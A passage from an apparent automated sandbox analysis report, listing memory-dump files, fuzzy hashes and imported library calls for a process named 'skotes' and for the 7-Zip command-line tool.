Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
Instruction ID: 3089a5aec9e6a53e9c6edacf01078283c59a47b3d893d3a4e1a7824c5b79c9ed
Opcode Fuzzy Hash: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
Instruction Fuzzy Hash: 66A1DFB1E01205AFDB24EF64CD4476ABBA8FF15334F048169E816D7241EB79EA04EBD1

Function 00F6CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F6CC66

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: c53fafddc465433499df8f720250a1c6099257d3a9e3fa3b0491c811a430a080
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 6DB11232D046859FDB11CF28C8817BEBBF5EF55350F14816AD8D5EB242D6399D02EBA0

Function 00F4BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00F4BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00F4BBE4
_xtime_get.LIBCPMT ref: 00F4BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00F4BC13

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
Instruction ID: a21de586506f67550394c0ba6fefc9a77e5b47f3cb337d253ae384483fc69e50
Opcode Fuzzy Hash: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
Instruction Fuzzy Hash: F5214F71E01119AFDF40EFA4DC819BEBBB9EF08720F114415FA05A7261DB389D05ABA0

Analysis Process: 7z.exePID: 8136, Parent PID: 7620COMMON

Executed Functions

Function 009B8817 Relevance: 130.3, APIs: 62, Strings: 12, Instructions: 780COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B8826
GetStdHandle.KERNEL32 ref: 009B887D
GetConsoleScreenBufferInfo.KERNELBASE ref: 009B888E
_CxxThrowException.MSVCRT ref: 009B89BD

Strings

Formats:, xrefs: 009B8CC7
Can't load module: , xrefs: 009B8A04
Codecs:, xrefs: 009B903E
, xrefs: 009B8FD6
Hashers:, xrefs: 009B92B6
offset=, xrefs: 009B8ECF
7-Zip cannot find the code that works with archives., xrefs: 009B8A54
Libs:, xrefs: 009B8C5B
KSNFMGOPBELH, xrefs: 009B8CDC, 009B8D4A
|| , xrefs: 009B8F0B
7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 009B881F
Unsupported archive type, xrefs: 009B8AAD, 009B8BB8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
API String ID: 3442115484-272389550
Opcode ID: efdbf60b1f87ae4701dada5a53c43e2d17decba6aa429ea7fbff77fc76d559b0
Instruction ID: 184c13c93aab09caa1b4cf410c1af576fd779ab43b28ceff23e90b06786434a4
Opcode Fuzzy Hash: efdbf60b1f87ae4701dada5a53c43e2d17decba6aa429ea7fbff77fc76d559b0
Instruction Fuzzy Hash: 18726D72214A8186DB34EF25EA903EE73A5F7C9BD0F408116DA8A47769DF3CC549CB40

Function 009924C0 Relevance: 102.2, APIs: 81, Instructions: 981COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009926E4
free.MSVCRT ref: 009926EF
free.MSVCRT ref: 0099274F
free.MSVCRT ref: 0099275A
free.MSVCRT ref: 009927FF
free.MSVCRT ref: 00992807
free.MSVCRT ref: 00992818
free.MSVCRT ref: 00992826
free.MSVCRT ref: 00992831
free.MSVCRT ref: 00992869
free.MSVCRT ref: 00992871
free.MSVCRT ref: 00992882
free.MSVCRT ref: 00992951
free.MSVCRT ref: 0099295C
free.MSVCRT ref: 00992A36
free.MSVCRT ref: 00992A3E
free.MSVCRT ref: 00992A52
free.MSVCRT ref: 00992A6C
free.MSVCRT ref: 00992A77
free.MSVCRT ref: 00992B8F
free.MSVCRT ref: 00992B97
free.MSVCRT ref: 00992BA8
free.MSVCRT ref: 00992BB6
free.MSVCRT ref: 00992BC1
free.MSVCRT ref: 00992C12
free.MSVCRT ref: 00992C1D
free.MSVCRT ref: 00992C30
free.MSVCRT ref: 00992C3B
free.MSVCRT ref: 00992C4E
free.MSVCRT ref: 00992C59
free.MSVCRT ref: 00992C6C
free.MSVCRT ref: 00992C77
free.MSVCRT ref: 00992CA7
free.MSVCRT ref: 00992CAF
free.MSVCRT ref: 00992CBB
free.MSVCRT ref: 00992CC9
free.MSVCRT ref: 00992CD4
free.MSVCRT ref: 00992D10
free.MSVCRT ref: 00992D18
free.MSVCRT ref: 00992D29
free.MSVCRT ref: 00992D37
free.MSVCRT ref: 00992D42
free.MSVCRT ref: 00992E6E
free.MSVCRT ref: 00992E79
free.MSVCRT ref: 00992EA6
free.MSVCRT ref: 00992EB1
free.MSVCRT ref: 00992F03
free.MSVCRT ref: 00992F0E
free.MSVCRT ref: 00992F97
free.MSVCRT ref: 00992F9F
free.MSVCRT ref: 00992FAD
free.MSVCRT ref: 00992FC2
free.MSVCRT ref: 00992FCD
free.MSVCRT ref: 0099300C
free.MSVCRT ref: 00993017
free.MSVCRT ref: 00993027
free.MSVCRT ref: 00993032
free.MSVCRT ref: 00993042
free.MSVCRT ref: 0099304D
free.MSVCRT ref: 0099305E
free.MSVCRT ref: 009931EB
free.MSVCRT ref: 009931F6
free.MSVCRT ref: 0099321C
free.MSVCRT ref: 00993227

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

free.MSVCRT ref: 0099325A
free.MSVCRT ref: 00993262

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 00993270
free.MSVCRT ref: 0099329E
free.MSVCRT ref: 009932A6
free.MSVCRT ref: 009932D9
free.MSVCRT ref: 009932E1
free.MSVCRT ref: 009932F1
free.MSVCRT ref: 009933E5
free.MSVCRT ref: 00993445
free.MSVCRT ref: 00993455
free.MSVCRT ref: 00993464
free.MSVCRT ref: 00993472
free.MSVCRT ref: 00993490
free.MSVCRT ref: 0099349E
free.MSVCRT ref: 009934BC
free.MSVCRT ref: 009934CA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
Instruction ID: cfa807641fa0de639db863fcb3fb8fc2285686043e81b04b208085845dcb73ec
Opcode Fuzzy Hash: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
Instruction Fuzzy Hash: CA826B33218A8096CE30EF6AE4903AEB364F7C5B90F548126EB9D57B59DF78C945CB10

Function 009947AC Relevance: 86.1, APIs: 56, Strings: 1, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 009948E0
free.MSVCRT ref: 009948EE
free.MSVCRT ref: 009949B8
free.MSVCRT ref: 009949F1
free.MSVCRT ref: 009949FF
free.MSVCRT ref: 00994A0D
free.MSVCRT ref: 00994A18
free.MSVCRT ref: 00994A47
free.MSVCRT ref: 00994A4F
free.MSVCRT ref: 00994A5D
free.MSVCRT ref: 00995052

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

free.MSVCRT ref: 00994C20
free.MSVCRT ref: 00994C2E
free.MSVCRT ref: 00994C3C
free.MSVCRT ref: 00994C47
free.MSVCRT ref: 00994C79
free.MSVCRT ref: 00994C81
free.MSVCRT ref: 00994C90
free.MSVCRT ref: 00994CB3
free.MSVCRT ref: 00994CC1
free.MSVCRT ref: 00994CCF
free.MSVCRT ref: 00994CDA
free.MSVCRT ref: 00994D0C
free.MSVCRT ref: 00994D14
free.MSVCRT ref: 00994D23
free.MSVCRT ref: 00994D76
free.MSVCRT ref: 00994D84
free.MSVCRT ref: 00994D92
free.MSVCRT ref: 00994D9D
free.MSVCRT ref: 00994DCC
free.MSVCRT ref: 00994DD4
free.MSVCRT ref: 00994DE3
GetLastError.KERNEL32 ref: 00994E70
free.MSVCRT ref: 00994EB2
free.MSVCRT ref: 00994EC0
free.MSVCRT ref: 00994ECE
free.MSVCRT ref: 00994ED9
free.MSVCRT ref: 00994F08
free.MSVCRT ref: 00994F10
free.MSVCRT ref: 00994F1F
free.MSVCRT ref: 00994FD5
free.MSVCRT ref: 00994FE3
free.MSVCRT ref: 00994FF1
free.MSVCRT ref: 00994FFC
free.MSVCRT ref: 0099502B
free.MSVCRT ref: 00995033
free.MSVCRT ref: 00995042
_CxxThrowException.MSVCRT ref: 0099510C
free.MSVCRT ref: 009951B9
free.MSVCRT ref: 009951C7
free.MSVCRT ref: 009951D5
free.MSVCRT ref: 009951E0
free.MSVCRT ref: 0099520F
free.MSVCRT ref: 00995217
free.MSVCRT ref: 00995226
free.MSVCRT ref: 00995234

Strings

Can not create output directory: , xrefs: 00994E83

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove$ErrorExceptionLastThrow
String ID: Can not create output directory:
API String ID: 4159955631-3123869724
Opcode ID: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
Instruction ID: 010d49d846d247dd2ee3c019258b96e01700358a1b8d3fe99770a2d398281edf
Opcode Fuzzy Hash: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
Instruction Fuzzy Hash: B9426123219AC096CE31EF2AE4907AEB365F7C6B80F549112DB9D47B59DF38C956CB00

Function 00995458 Relevance: 74.2, APIs: 47, Strings: 2, Instructions: 702
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 0099558E
_CxxThrowException.MSVCRT ref: 009955C2
_CxxThrowException.MSVCRT ref: 009955E6
memset.MSVCRT ref: 0099561F
free.MSVCRT ref: 009956F2
free.MSVCRT ref: 00995F84

Strings

there is no such archive, xrefs: 009955A4, 00995EF9
can't decompress folder, xrefs: 009955C8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrow$memset
String ID: can't decompress folder$there is no such archive
API String ID: 4182836161-2069749860
Opcode ID: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
Instruction ID: 9b0447387a5d192900c0865b3fdc663514d64adc9b87e326d9cd0e7f7eb7aec4
Opcode Fuzzy Hash: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
Instruction Fuzzy Hash: D1524B33219AC086CA21EB2AE4847AFB764F7C6B94F455112DF9E53B29DF38C855CB40

Function 0099F13E Relevance: 59.4, APIs: 47, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
Instruction ID: 2a4ccbdd6612da630262adf4cf9ac361585e3e5a197f8bc6b642c2d5aa29c4d6
Opcode Fuzzy Hash: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
Instruction Fuzzy Hash: 01427037219AC086CB24DF2AE0A07AEB765F3CAB88F555461EB5E87B15CF39C485C710

Function 00980DCC Relevance: 51.4, APIs: 17, Strings: 12, Instructions: 652COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00980E15
free.MSVCRT ref: 00980E4E
_CxxThrowException.MSVCRT ref: 00980E7A
free.MSVCRT ref: 00980EBD
wcscmp.MSVCRT ref: 00980F33
_CxxThrowException.MSVCRT ref: 00980F9B
_CxxThrowException.MSVCRT ref: 0098112A
_CxxThrowException.MSVCRT ref: 009813AC
_CxxThrowException.MSVCRT ref: 009814D3
_CxxThrowException.MSVCRT ref: 009815E3
_CxxThrowException.MSVCRT ref: 00981730
_CxxThrowException.MSVCRT ref: 00981761
_CxxThrowException.MSVCRT ref: 009817A2
_CxxThrowException.MSVCRT ref: 00981801
